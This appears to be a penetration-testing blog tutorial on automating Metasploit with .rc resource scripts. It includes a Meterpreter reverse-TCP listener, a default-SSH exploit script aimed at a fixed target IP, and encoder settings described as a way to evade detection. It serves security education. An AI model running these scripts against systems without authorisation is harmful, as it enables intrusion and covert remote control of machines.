Automated Penetration Testing with Metasploit Framework

The post provides a comprehensive guide to Metasploit Automation, focusing on creating reusable scripts for repeated tasks like setting up listeners and executing exploits

Metasploit Study Notes

This document contains notes on how to use Metasploit during the stages of a pentest. It also includes basics on how to…

The Complete Practical Metasploit Framework Course

Course Content:Chapter 1: Introduction to Metasploit Framework Chapter 2: Understanding Metasploit Modules Chapter 3…

Overview

• Purpose: Automating repetitive tasks in Metasploit, such as setting up listeners or reusing specific exploits.
• Why Automate?:
• Saves time when working on multiple machines or recurring scenarios.
• Streamlines penetration testing tasks.

Topics Covered

1. Automating Listeners

1. Creating Listener Scripts:

• Directory Setup:

mkdir listeners 
cd listeners

Example Script: windows_metasploit_listener.rc

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set LHOST <your_IP> 
set LPORT <your_port> 
set ExitOnSession false 
exploit -j -z

• Save the script with .rc extension (e.g., windows_listener.rc).

Launching the Script:

• Command:

sudo msfconsole -r windows_listener.rc

• Automates the setup of the Metasploit listener for the payload.

1. Multiple Listeners:

• Create separate scripts for different payloads (e.g., Android, PHP).
• Adjust parameters like LHOST, LPORT, and payload type as required.

2. Automating Exploits

1. Creating Exploit Scripts:

• Directory Setup:

mkdir exploits 
cd exploits

Example Script: apple_exploit.rc

use exploit/apple/ios/default_ssh 
set RHOSTS 192.168.94.4 
set RPORT 22 
set ExitOnSession false 
exploit -j -z

• Save the script with .rc extension (e.g., apple_exploit.rc).

Launching the Script:

• Command:

sudo msfconsole -r apple_exploit.rc

Executes the exploit script against the target.

3. Key Automation Concepts

• Encoders and Stage Encoding:
• Use to evade detection.
• Example command in script:

set EnableStageEncoding true 
set StageEncoder x86/shikata_ga_nai

Exit on Session:

• Prevents listener from closing after a session is established:

set ExitOnSession false

• Dynamic Port Management:
• Avoid conflicts by assigning unique ports for each listener or exploit.

Advanced Use Cases

Combining Listeners and Exploits:

• Automate complete workflows by linking listener scripts with specific exploit scripts.

Scaling for Large Networks:

• Adjust scripts to target multiple machines by modifying the RHOSTS parameter.

Troubleshooting

Common Issues:

• Typos in commands (e.g., multi/handler vs. multihandler).
• Port conflicts: Ensure unique ports for each listener or exploit.
• Payload mismatches: Verify the payload in scripts matches the target architecture.

Debugging Steps:

• Check syntax in .rc files.
• Run Metasploit interactively to validate commands before scripting.

Best Practices

Organize Scripts:

• Use clear naming conventions (e.g., windows_listener.rc, android_listener.rc).

Test Scripts:

• Validate functionality in a controlled environment before using in production.

Reuse and Adapt:

• Create a library of scripts for common scenarios.

Conclusion

Why Automate?:

• Increases efficiency in penetration testing.
• Reduces manual errors and saves time.

Next Steps:

• Experiment with scripting complex workflows.
• Integrate Metasploit automation into larger pentesting pipelines.

If you have further questions or need clarification on any part of the tutorial, let me know!

Video Walkthrough

More Cyber Security Articles

CyberSecurity Articles and Guides - Motasem Hamdan

Buffer Overflow & Binary Exploitation Techniques | Methodology and Practical Notes